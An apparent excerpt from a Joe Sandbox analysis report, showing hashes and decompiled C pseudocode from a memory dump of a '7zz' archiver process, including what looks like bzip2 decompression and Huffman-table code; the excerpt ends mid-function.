Opcode Fuzzy Hash: 40c36dd2d9e12414e66adf71fdb657f7f3508d8c1f6a41737e3c26815d29bb3b
Instruction Fuzzy Hash: DE42D2716083818FE715DF28C49066FBBE2BFD9308F14496EE8D59B342DA35D806CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0042DBB6 Relevance: 1.7, APIs: 1, Instructions: 246
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0042DBB6(intOrPtr __ecx, signed int __edx) {
				signed int _t133;
				intOrPtr _t135;
				signed int _t136;
				signed int _t137;
				signed int _t148;
				intOrPtr _t159;
				signed int _t160;
				intOrPtr _t162;
				void* _t164;
				signed int _t167;
				intOrPtr _t175;
				signed int _t177;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t201;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				intOrPtr _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed int _t223;
				signed int _t225;
				void* _t226;

				_t211 = __edx;
				E0046B890(E00477530, _t226);
				_t175 = __ecx;
				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
				E0040862D();
				_t223 =  *(_t226 + 8);
				E0040867E( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
				while(1) {
					_t133 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
					_t183 = _t211;
					 *(_t226 - 0x1c) = _t133;
					 *(_t226 - 0x18) = _t183;
					if(_t133 != 0xd) {
						goto L6;
					}
					L2:
					_t211 = 0;
					if(_t183 != 0) {
						L7:
						__eflags = _t133 - 0xa;
						if(_t133 != 0xa) {
							L9:
							__eflags = _t133 - 9;
							if(_t133 != 9) {
								L11:
								__eflags = _t133 | _t183;
								if((_t133 | _t183) == 0) {
									L13:
									_t135 =  *((intOrPtr*)(_t226 + 0xc));
									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
										L17:
										_t184 =  *((intOrPtr*)(_t226 + 0xc));
										_t214 = 0;
										 *(_t226 - 0x10) = 0;
										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
											L27:
											__eflags =  *(_t226 - 0x1c) - 9;
											if( *(_t226 - 0x1c) == 9) {
												__eflags =  *(_t226 - 0x18) - _t211;
												if( *(_t226 - 0x18) == _t211) {
													_t160 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
													_t184 =  *((intOrPtr*)(_t226 + 0xc));
													 *(_t226 - 0x18) = _t211;
													 *(_t226 - 0x1c) = _t160;
													_t211 = 0;
													__eflags = 0;
												}
											}
											_t215 =  *(_t223 + 8);
											 *(_t226 - 0x10) = _t211;
											__eflags = _t215 - _t211;
											 *(_t226 + 8) = _t211;
											if(_t215 <= _t211) {
												L37:
												_t136 =  *(_t226 - 0x1c);
												__eflags = _t136 - 0xa;
												if(_t136 != 0xa) {
													L48:
													_t137 = _t136 |  *(_t226 - 0x18);
													__eflags = _t137;
													if(_t137 == 0) {
														_t185 =  *((intOrPtr*)(_t226 + 0x14));
														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
															L54:
															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
															return _t137;
														}
														E0042CFAA(_t185,  *(_t226 + 8));
														_t137 = E0040862D();
														_t225 =  *(_t226 + 8);
														__eflags = _t225;
														if(_t225 <= 0) {
															goto L54;
														} else {
															goto L53;
														}
														do {
															L53:
															_t137 = E00415C6D( *((intOrPtr*)(_t226 + 0x18)), 0);
															_t225 = _t225 - 1;
															__eflags = _t225;
														} while (_t225 != 0);
														goto L54;
													}
													E0042D192( *((intOrPtr*)(_t175 + 0x18)), _t211);
													L50:
													 *(_t226 - 0x1c) = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
													 *(_t226 - 0x18) = _t211;
													goto L36;
												}
												__eflags =  *(_t226 - 0x18) - _t211;
												if(__eflags != 0) {
													goto L48;
												}
												 *(_t226 - 0x48) = _t211;
												 *(_t226 - 0x44) = _t211;
												 *(_t226 - 0x40) = _t211;
												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
												 *((intOrPtr*)(_t226 - 0x4c)) = 0x47ab08;
												 *(_t226 - 4) = _t211;
												 *(_t226 - 0x34) = _t211;
												 *(_t226 - 0x30) = _t211;
												 *(_t226 - 0x2c) = _t211;
												 *((intOrPtr*)(_t226 - 0x28)) = 4;
												 *((intOrPtr*)(_t226 - 0x38)) = 0x47ab80;
												 *(_t226 - 4) = 1;
												E0042D850(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
												_t177 = 0;
												__eflags =  *(_t223 + 8);
												 *(_t226 + 0x10) = 0;
												if( *(_t223 + 8) <= 0) {
													L47:
													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
													E00408604(_t226 - 0x38);
													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
													E00408604(_t226 - 0x4c);
													_t175 =  *((intOrPtr*)(_t226 - 0x14));
													goto L50;
												} else {
													goto L40;
												}
												do {
													L40:
													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
													__eflags = _t148 - 1;
													if(_t148 != 1) {
														L43:
														__eflags = _t148;
														if(_t148 <= 0) {
															goto L46;
														}
														_t218 = _t148;
														do {
															E0043AC2F( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
															E00415C6D( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
															_t218 = _t218 - 1;
															__eflags = _t218;
														} while (_t218 != 0);
														goto L46;
													}
													__eflags =  *((char*)(_t217 + 0x54));
													if( *((char*)(_t217 + 0x54)) == 0) {
														goto L43;
													}
													E0043AC2F( *((intOrPtr*)(_t226 + 0x14)), _t148);
													E00415C6D( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
													L46:
													_t177 = _t177 + 1;
													__eflags = _t177 -  *(_t223 + 8);
												} while (_t177 <  *(_t223 + 8));
												goto L47;
											} else {
												 *(_t226 + 0x10) =  *(_t184 + 0xc);
												do {
													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
													__eflags = _t201 - 1;
													if(_t201 != 1) {
														L34:
														_t64 = _t226 - 0x10;
														 *_t64 =  *(_t226 - 0x10) + _t201;
														__eflags =  *_t64;
														goto L35;
													}
													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
													__eflags =  *((char*)(_t159 + 0x54));
													if( *((char*)(_t159 + 0x54)) != 0) {
														goto L35;
													}
													goto L34;
													L35:
													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
													_t211 = _t211 + 1;
													__eflags = _t211 - _t215;
												} while (_t211 < _t215);
												L36:
												_t211 = 0;
												__eflags = 0;
												goto L37;
											}
										} else {
											goto L18;
										}
										do {
											L18:
											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
											__eflags = _t162 - _t211;
											if(_t162 == _t211) {
												goto L26;
											}
											__eflags = _t162 - 1;
											 *(_t226 - 0x24) = _t211;
											 *(_t226 - 0x20) = _t211;
											if(_t162 <= 1) {
												L25:
												_t164 = E00429826( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
												asm("sbb edx, [ebp-0x20]");
												E0042389F( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
												_t184 =  *((intOrPtr*)(_t226 + 0xc));
												_t211 = 0;
												__eflags = 0;
												goto L26;
											}
											_t167 = _t162 - 1;
											__eflags = _t167;
											 *(_t226 + 8) = _t167;
											do {
												__eflags =  *(_t226 - 0x1c) - 9;
												if( *(_t226 - 0x1c) == 9) {
													__eflags =  *(_t226 - 0x18) - _t211;
													if( *(_t226 - 0x18) == _t211) {
														_t219 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
														E0042389F( *(_t226 + 0x10), _t219, _t211);
														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
														_t214 =  *(_t226 - 0x10);
														asm("adc [ebp-0x20], ebx");
														_t175 =  *((intOrPtr*)(_t226 - 0x14));
														_t211 = 0;
														__eflags = 0;
													}
												}
												_t36 = _t226 + 8;
												 *_t36 =  *(_t226 + 8) - 1;
												__eflags =  *_t36;
											} while ( *_t36 != 0);
											goto L25;
											L26:
											_t214 = _t214 + 1;
											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
											 *(_t226 - 0x10) = _t214;
										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
										goto L27;
									}
									_t220 = 0;
									__eflags =  *(_t223 + 8) - _t211;
									if( *(_t223 + 8) <= _t211) {
										goto L17;
									} else {
										goto L15;
									}
									do {
										L15:
										E00415C6D( *((intOrPtr*)(_t226 + 0xc)), 1);
										_t220 = _t220 + 1;
										__eflags = _t220 -  *(_t223 + 8);
									} while (_t220 <  *(_t223 + 8));
									_t211 = 0;
									__eflags = 0;
									goto L17;
								}
								E0042D192( *((intOrPtr*)(_t175 + 0x18)), _t211);
								while(1) {
									_t133 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
									_t183 = _t211;
									 *(_t226 - 0x1c) = _t133;
									 *(_t226 - 0x18) = _t183;
									if(_t133 != 0xd) {
										goto L6;
									}
									goto L2;
								}
								goto L6;
							}
							__eflags = _t183 - _t211;
							if(_t183 == _t211) {
								goto L13;
							}
							goto L11;
						}
						__eflags = _t183 - _t211;
						if(_t183 == _t211) {
							goto L13;
						}
						goto L9;
					}
					_t221 = 0;
					if( *(_t223 + 8) <= 0) {
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E00415C6D( *((intOrPtr*)(_t226 + 0xc)), E0042D241(0));
						_t221 = _t221 + 1;
					} while (_t221 <  *(_t223 + 8));
					continue;
					L6:
					_t211 = 0;
					__eflags = 0;
					goto L7;
				}
			}

0x0042dbb6
0x0042dbbb
0x0042dbc4
0x0042dbcb
0x0042dbce
0x0042dbd3
0x0042dbdc
0x0042dbe1
0x0042dbe4
0x0042dbe9
0x0042dbee
0x0042dbf1
0x0042dbf4
0x00000000
0x00000000
0x0042dbf6
0x0042dbf6
0x0042dbfa
0x0042dc1e
0x0042dc1e
0x0042dc21
0x0042dc27
0x0042dc27
0x0042dc2a
0x0042dc30
0x0042dc30
0x0042dc32
0x0042dc3e
0x0042dc3e
0x0042dc41
0x0042dc44
0x0042dc5f
0x0042dc5f
0x0042dc62
0x0042dc64
0x0042dc67
0x0042dc6a
0x0042dce2
0x0042dce2
0x0042dce6
0x0042dce8
0x0042dceb
0x0042dcf0
0x0042dcf5
0x0042dcf8
0x0042dcfb
0x0042dcfe
0x0042dcfe
0x0042dcfe
0x0042dceb
0x0042dd00
0x0042dd03
0x0042dd06
0x0042dd08
0x0042dd0b
0x0042dd37
0x0042dd37
0x0042dd3a
0x0042dd3d
0x0042de1f
0x0042de1f
0x0042de1f
0x0042de22
0x0042de3f
0x0042de42
0x0042de45
0x0042de6b
0x0042de71
0x0042de79
0x0042de79
0x0042de4a
0x0042de52
0x0042de57
0x0042de5a
0x0042de5c
0x00000000
0x00000000
0x00000000
0x00000000
0x0042de5e
0x0042de5e
0x0042de63
0x0042de68
0x0042de68
0x0042de68
0x00000000
0x0042de5e
0x0042de27
0x0042de2c
0x0042de34
0x0042de37
0x00000000
0x0042de37
0x0042dd43
0x0042dd46
0x00000000
0x00000000
0x0042dd4c
0x0042dd4f
0x0042dd52
0x0042dd55
0x0042dd5c
0x0042dd63
0x0042dd66
0x0042dd69
0x0042dd6c
0x0042dd6f
0x0042dd76
0x0042dd87
0x0042dd8e
0x0042dd93
0x0042dd95
0x0042dd98
0x0042dd9b
0x0042de02
0x0042de02
0x0042de09
0x0042de0e
0x0042de15
0x0042de1a
0x00000000
0x00000000
0x00000000
0x00000000
0x0042dd9d
0x0042dd9d
0x0042dda6
0x0042dda9
0x0042ddac
0x0042ddaf
0x0042ddcd
0x0042ddcd
0x0042ddcf
0x00000000
0x00000000
0x0042ddd1
0x0042ddd3
0x0042dde0
0x0042ddf1
0x0042ddf6
0x0042ddf9
0x0042ddf9
0x0042ddf9
0x00000000
0x0042ddd3
0x0042ddb1
0x0042ddb5
0x00000000
0x00000000
0x0042ddbb
0x0042ddc6
0x0042ddfc
0x0042ddfc
0x0042ddfd
0x0042ddfd
0x00000000
0x0042dd0d
0x0042dd10
0x0042dd13
0x0042dd16
0x0042dd19
0x0042dd1c
0x0042dd2a
0x0042dd2a
0x0042dd2a
0x0042dd2a
0x00000000
0x0042dd2a
0x0042dd21
0x0042dd24
0x0042dd28
0x00000000
0x00000000
0x00000000
0x0042dd2d
0x0042dd2d
0x0042dd30
0x0042dd31
0x0042dd31
0x0042dd35
0x0042dd35
0x0042dd35
0x00000000
0x0042dd35
0x00000000
0x00000000
0x00000000
0x0042dc6c
0x0042dc6c
0x0042dc6f
0x0042dc72
0x0042dc74
0x00000000
0x00000000
0x0042dc76
0x0042dc79
0x0042dc7c
0x0042dc7f
0x0042dcb9
0x0042dcbf
0x0042dcca
0x0042dccf
0x0042dcd4
0x0042dcd7
0x0042dcd7
0x00000000
0x0042dcd7
0x0042dc81
0x0042dc81
0x0042dc82
0x0042dc85
0x0042dc85
0x0042dc89
0x0042dc8b
0x0042dc8e
0x0042dc9d
0x0042dca1
0x0042dca6
0x0042dca9
0x0042dcac
0x0042dcaf
0x0042dcb2
0x0042dcb2
0x0042dcb2
0x0042dc8e
0x0042dcb4
0x0042dcb4
0x0042dcb4
0x0042dcb4
0x00000000
0x0042dcd9
0x0042dcd9
0x0042dcda
0x0042dcdd
0x0042dcdd
0x00000000
0x0042dc6c
0x0042dc46
0x0042dc48
0x0042dc4b
0x00000000
0x00000000
0x00000000
0x00000000
0x0042dc4d
0x0042dc4d
0x0042dc52
0x0042dc57
0x0042dc58
0x0042dc58
0x0042dc5d
0x0042dc5d
0x00000000
0x0042dc5d
0x0042dc37
0x0042dbe1
0x0042dbe4
0x0042dbe9
0x0042dbee
0x0042dbf1
0x0042dbf4
0x00000000
0x00000000
0x00000000
0x0042dbf4
0x00000000
0x0042dbe1
0x0042dc2c
0x0042dc2e
0x00000000
0x00000000
0x00000000
0x0042dc2e
0x0042dc23
0x0042dc25
0x00000000
0x00000000
0x00000000
0x0042dc25
0x0042dbfc
0x0042dc01
0x00000000
0x00000000
0x00000000
0x00000000
0x0042dc03
0x0042dc03
0x0042dc0f
0x0042dc14
0x0042dc15
0x00000000
0x0042dc1c
0x0042dc1c
0x0042dc1c
0x00000000
0x0042dc1c

APIs

__EH_prolog.LIBCMT ref: 0042DBBB

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2efe874e0d54bcc63b88533e8d0e92cc829ab34bf8cfbc3d7771b8826d61e310
Instruction ID: f0c02de7351495f9103b866f9f83217b28a37e7e00b398bfa100c8a62c2efe4d
Opcode Fuzzy Hash: 2efe874e0d54bcc63b88533e8d0e92cc829ab34bf8cfbc3d7771b8826d61e310
Instruction Fuzzy Hash: D2A14D70E006199FCB18DF56D8919AEB7B2FF94304F64842EE4159B351DB38AD81CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004469A0 Relevance: 1.7, Strings: 1, Instructions: 496
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E004469A0(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _t218;
				char _t226;
				char _t228;
				unsigned int _t241;
				intOrPtr _t243;
				signed char _t247;
				void* _t252;
				intOrPtr _t255;
				signed int _t257;
				signed char _t260;
				signed int _t267;
				signed int _t270;
				signed int _t275;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr* _t280;
				signed int _t286;
				unsigned int _t294;
				unsigned int _t295;
				intOrPtr _t316;
				void _t317;
				intOrPtr _t318;
				void* _t319;
				unsigned int _t320;
				intOrPtr _t324;
				void* _t346;
				signed int _t350;
				intOrPtr _t359;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed char _t367;
				signed int _t368;
				signed int _t378;
				signed char _t385;
				intOrPtr _t394;
				intOrPtr _t396;
				unsigned int _t399;
				signed int _t400;
				signed int _t409;
				intOrPtr* _t423;
				int _t424;
				intOrPtr _t425;
				intOrPtr* _t426;
				signed int _t430;
				signed int _t431;
				signed int* _t436;
				signed int _t445;
				void* _t446;
				void* _t447;
				void* _t448;
				unsigned int _t455;
				signed int _t460;
				unsigned int* _t462;
				intOrPtr _t463;
				void* _t465;
				char* _t468;
				void* _t469;
				signed int _t470;
				intOrPtr _t471;
				void* _t472;
				intOrPtr* _t473;
				signed int _t478;
				signed int _t481;
				intOrPtr _t484;
				unsigned int _t486;
				unsigned int _t489;
				signed int _t491;
				signed int _t492;
				intOrPtr _t495;
				signed int _t496;
				void* _t497;
				signed int _t502;
				void* _t503;
				void* _t504;
				void* _t506;

				_t468 =  *((intOrPtr*)(_t503 + 0x314));
				 *((intOrPtr*)(_t503 + 0x3c)) = __edx;
				 *((intOrPtr*)(_t503 + 0x10)) = __ecx;
				if(_t468 != 0) {
					 *_t468 = E00447070() & 0xffffff00 | _t313 != 0x00000000;
				}
				_t218 = E00446FF0(0x18);
				 *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x314)))) = _t218;
				if(_t218 >=  *((intOrPtr*)(_t503 + 0x304))) {
					L82:
					return 1;
				} else {
					memset(_t503 + 0xa8, 0, 0x40 << 2);
					_t504 = _t503 + 0xc;
					_t445 = 0;
					_t469 = 0;
					 *(_t504 + 0x28) = 0;
					do {
						 *((char*)(_t504 + _t469 + 0x44)) = E00447070();
						_t469 = _t469 + 1;
					} while (_t469 < 0x10);
					_t470 = 0;
					do {
						if( *((intOrPtr*)(_t504 + (_t470 >> 4) + 0x44)) != 0 && E00447070() != 0) {
							_t409 = _t445;
							_t445 = _t445 + 1;
							 *(_t504 + 0xa8 + (_t409 >> 2) * 4) =  *(_t504 + 0xa8 + (_t409 >> 2) * 4) | (_t470 & 0x000000ff) << (_t409 & 0x00000003) << 0x00000003;
						}
						_t470 = _t470 + 1;
					} while (_t470 < 0x100);
					 *(_t504 + 0x28) = _t445;
					if(_t445 == 0) {
						goto L82;
					} else {
						_t471 = E00446FF0(3);
						 *((intOrPtr*)(_t504 + 0x14)) = _t471;
						if(_t471 < 2 || _t471 > 6) {
							goto L82;
						} else {
							_t316 = E00446FF0(0xf);
							 *((intOrPtr*)(_t504 + 0x40)) = _t316;
							if(_t316 < 1 || _t316 > 0x4652) {
								goto L82;
							} else {
								_t226 = 0;
								do {
									 *((char*)(_t504 + _t226 + 0x30)) = _t226;
									_t226 = _t226 + 1;
								} while (_t226 < _t471);
								_t495 =  *((intOrPtr*)(_t504 + 0x308));
								_t446 = 0;
								do {
									_t472 = 0;
									if(E00447070() == 0) {
										L21:
										_t228 =  *((intOrPtr*)(_t504 + _t472 + 0x30));
										while(_t472 > 0) {
											 *((char*)(_t504 + _t472 + 0x30)) =  *((intOrPtr*)(_t504 + _t472 + 0x2f));
											_t472 = _t472 - 1;
										}
										goto L23;
									} else {
										while(1) {
											_t472 = _t472 + 1;
											if(_t472 >=  *((intOrPtr*)(_t504 + 0x14))) {
												goto L82;
											}
											if(E00447070() != 0) {
												continue;
											} else {
												goto L21;
											}
											goto L83;
										}
										goto L82;
									}
									goto L83;
									L23:
									 *((char*)(_t446 + _t495)) = _t228;
									_t446 = _t446 + 1;
									 *((char*)(_t504 + 0x30)) = _t228;
								} while (_t446 < _t316);
								_t473 =  *((intOrPtr*)(_t504 + 0x30c));
								_t496 =  *(_t504 + 0x28);
								 *(_t504 + 0x18) = 0;
								do {
									_t317 = E00446FF0(5);
									_t447 = 0;
									if(_t496 + 2 <= 0) {
										L32:
										_t448 = _t504 + _t447 + 0x1fc;
										memset(_t448 + (0x102 - _t447 >> 2), memset(_t448, 0, 0x102 << 2), 2 << 0);
										_t504 = _t504 + 0x18;
										goto L33;
									} else {
										while(_t317 >= 1 && _t317 <= 0x14) {
											if(E00447070() == 0) {
												 *(_t504 + _t447 + 0x1fc) = _t317;
												_t447 = _t447 + 1;
												if(_t447 < _t496 + 2) {
													continue;
												} else {
													if(_t447 < 0x102) {
														goto L32;
													}
													L33:
													_t423 = _t473 + 0xa8;
													memset(_t504 + 0x58, 0, 0x14 << 2);
													_t504 = _t504 + 0xc;
													_t346 = 0;
													while(0 <= 0x14) {
														 *_t423 = 0xffffffff;
														_t346 = _t346 + 1;
														_t423 = _t423 + 4;
														 *((intOrPtr*)(_t504 + 0x54)) =  *((intOrPtr*)(_t504 + 0x54)) + 1;
														if(_t346 < 0x102) {
															continue;
														} else {
															_t455 = 0;
															_t318 = 0;
															 *((intOrPtr*)(_t504 + 0x54)) = 0;
															 *_t473 = 0;
															 *((intOrPtr*)(_t473 + 0x54)) = 0;
															 *((intOrPtr*)(_t504 + 0x20)) = 0;
															_t424 = 1;
															while(1) {
																_t455 = _t455 + ( *(_t504 + 0x54 + _t424 * 4) << 0x14 - _t424);
																 *(_t504 + 0x2c) = _t455;
																if(_t455 > 0x100000) {
																	goto L82;
																}
																_t241 = 0x100000;
																if(_t424 != 0x14) {
																	_t241 = _t455;
																}
																 *(_t473 + _t424 * 4) = _t241;
																_t243 =  *((intOrPtr*)(_t504 + 0x50 + _t424 * 4)) +  *((intOrPtr*)(_t473 + 0x50 + _t424 * 4));
																 *((intOrPtr*)(_t473 + 0x54 + _t424 * 4)) = _t243;
																 *((intOrPtr*)(_t504 + 0x1a8 + _t424 * 4)) = _t243;
																if(_t424 <= 9) {
																	_t294 =  *(_t473 + _t424 * 4) >> 0xb;
																	if(_t318 < _t294) {
																		_t295 = _t294 - _t318;
																		_t465 = _t473 + _t318 + 0x4b0;
																		 *(_t504 + 0x24) = _t295;
																		_t399 = _t295;
																		_t502 = _t399;
																		_t324 =  *((intOrPtr*)(_t504 + 0x20));
																		_t400 = _t399 >> 2;
																		memset(_t465 + _t400, memset(_t465, _t424, _t400 << 2), (_t502 & 0x00000003) << 0);
																		_t504 = _t504 + 0x18;
																		_t455 =  *(_t504 + 0x2c);
																		_t496 =  *(_t504 + 0x28);
																		_t318 = _t324 + _t502;
																		 *((intOrPtr*)(_t504 + 0x20)) = _t318;
																	}
																}
																_t424 = _t424 + 1;
																if(_t424 <= 0x14) {
																	continue;
																} else {
																	_t425 = 0;
																	do {
																		if(0 != 0) {
																			_t350 =  *(_t504 + 0x1a8);
																			 *((intOrPtr*)(_t473 + 0xa8 + _t350 * 4)) = _t425;
																			 *(_t504 + 0x1a8) = _t350 + 1;
																		}
																		_t425 = _t425 + 1;
																	} while (_t425 < 0x102);
																	goto L48;
																}
																goto L83;
															}
															goto L82;
														}
														goto L83;
													}
													goto L82;
												}
											} else {
												_t317 = _t317 + 1 - (E00447070() << 1);
												continue;
											}
											goto L83;
										}
										goto L82;
									}
									goto L83;
									L48:
									_t247 =  *(_t504 + 0x18) + 1;
									_t473 = _t473 + 0x6b0;
									 *(_t504 + 0x18) = _t247;
								} while (_t247 <  *((intOrPtr*)(_t504 + 0x14)));
								_t319 =  *(_t504 + 0x3c);
								_t497 = 0;
								memset(_t319, 0, 0x100 << 2);
								_t506 = _t504 + 0xc;
								 *(_t506 + 0x1c) = 0;
								 *((intOrPtr*)(_t506 + 0x38)) = 0;
								 *((intOrPtr*)(_t506 + 0x18)) = 0;
								 *(_t506 + 0x20) = 0;
								 *((intOrPtr*)(_t506 + 0x14)) = 0;
								while(1) {
									L50:
									_t426 =  *((intOrPtr*)(_t506 + 0x10));
									L51:
									while(1) {
										if( *((intOrPtr*)(_t506 + 0x18)) != 0) {
											L54:
											 *((intOrPtr*)(_t506 + 0x18)) =  *((intOrPtr*)(_t506 + 0x18)) - 1;
											_t478 =  *(_t426 + 4) >> 0x00000008 -  *_t426 >> 0x00000004 & 0x000fffff;
											if(_t478 >=  *((intOrPtr*)(_t497 + 0x24))) {
												_t133 = _t497 + 0x28; // 0x28
												_t252 = _t133;
												_t460 = 0xa;
												if(_t478 >=  *((intOrPtr*)(_t497 + 0x28))) {
													do {
														_t396 =  *((intOrPtr*)(_t252 + 4));
														_t252 = _t252 + 4;
														_t460 = _t460 + 1;
													} while (_t478 >= _t396);
												}
											} else {
												_t460 = 0;
											}
											_t359 =  *_t426 + _t460;
											 *_t426 = _t359;
											if(_t359 >= 8) {
												do {
													_t280 =  *((intOrPtr*)(_t426 + 8));
													if(_t280 <  *((intOrPtr*)(_t426 + 0xc))) {
														 *(_t506 + 0x2c) =  *_t280;
														 *((intOrPtr*)(_t426 + 8)) = _t280 + 1;
													} else {
														_t286 = E0040E070( *((intOrPtr*)(_t506 + 0x10)) + 8);
														_t426 =  *((intOrPtr*)(_t506 + 0x10));
														 *(_t506 + 0x2c) = _t286;
													}
													_t394 =  *_t426 + 0xfffffff8;
													 *(_t426 + 4) =  *(_t426 + 4) << 0x00000008 |  *(_t506 + 0x2c) & 0x000000ff;
													 *_t426 = _t394;
												} while (_t394 >= 8);
											}
											_t362 = 0x14 - _t460;
											_t481 = (_t478 -  *((intOrPtr*)(_t497 + _t460 * 4 - 4)) >> _t362) +  *((intOrPtr*)(_t497 + 0x54 + _t460 * 4));
											if(_t481 < 0x102) {
												_t363 =  *(_t497 + 0xa8 + _t481 * 4);
												if(_t363 >= 2) {
													goto L65;
												} else {
													_t385 =  *(_t506 + 0x20);
													_t279 =  *((intOrPtr*)(_t506 + 0x14)) + (_t363 + 1 << _t385);
													 *(_t506 + 0x20) = _t385 + 1;
													 *((intOrPtr*)(_t506 + 0x14)) = _t279;
													if( *((intOrPtr*)(_t506 + 0x304)) -  *(_t506 + 0x1c) < _t279) {
														goto L82;
													} else {
														continue;
													}
												}
											} else {
												_t363 = _t362 | 0xffffffff;
												L65:
												if( *((intOrPtr*)(_t506 + 0x14)) != 0) {
													_t463 =  *((intOrPtr*)(_t506 + 0x14));
													_t492 =  *(_t506 + 0x1c);
													_t277 =  *(_t506 + 0xa8) & 0x000000ff;
													 *((intOrPtr*)(_t319 + _t277 * 4)) =  *((intOrPtr*)(_t319 + _t277 * 4)) + _t463;
													_t436 = _t319 + 0x400 + _t492 * 4;
													do {
														 *_t436 = _t277;
														_t492 = _t492 + 1;
														_t436 =  &(_t436[1]);
														_t463 = _t463 - 1;
													} while (_t463 != 0);
													 *((intOrPtr*)(_t506 + 0x14)) = _t463;
													 *(_t506 + 0x1c) = _t492;
													 *(_t506 + 0x20) = 0;
												}
												_t255 =  *((intOrPtr*)(_t506 + 0x28));
												if(_t363 > _t255) {
													if(_t363 != _t255 + 1) {
														goto L82;
													} else {
														_t257 =  *(_t506 + 0x1c);
														 *( *(_t506 + 0x310)) = _t257;
														asm("sbb eax, eax");
														return _t257 + 1;
													}
												} else {
													_t365 = _t363 - 1;
													_t260 = _t365 >> 2;
													_t367 = (_t365 & 0x00000003) << 3;
													 *(_t506 + 0x30) = _t367;
													_t368 = 0;
													_t430 =  *(_t506 + 0xa8 + _t260 * 4) >> _t367 & 0x000000ff;
													if((_t260 & 0x00000001) != 0) {
														_t489 =  *(_t506 + 0xa8);
														_t491 = _t489 << 0x00000008 | _t430;
														_t430 = _t489 >> 0x18;
														 *(_t506 + 0xa8) = _t491;
														_t368 = 1;
														_t260 = _t260 - 1;
													}
													if(_t368 < _t260) {
														_t462 = _t506 + 0xa8 + _t368 * 4;
														_t270 = _t260 - _t368 + 1 >> 1;
														 *(_t506 + 0x24) = _t270;
														_t368 = _t368 + _t270 * 2;
														do {
															_t486 =  *_t462;
															_t320 = _t462[1];
															_t462 =  &(_t462[2]);
															 *(_t462 - 8) = _t486 << 0x00000008 | _t430;
															 *(_t462 - 4) = _t486 >> 0x00000018 | _t320 << 0x00000008;
															_t275 =  *(_t506 + 0x24) - 1;
															_t430 = _t320 >> 0x18;
															 *(_t506 + 0x24) = _t275;
														} while (_t275 != 0);
													}
													_t431 =  *(_t506 + 0x1c);
													 *(_t506 + 0xa8 + _t368 * 4) = ( *(_t506 + 0xa8 + _t368 * 4) << 0x00000008 | _t430) & 0x00000100 |  !((0x100 <<  *(_t506 + 0x30)) - 1) &  *(_t506 + 0xa8 + _t368 * 4);
													_t267 =  *(_t506 + 0xa8) & 0x000000ff;
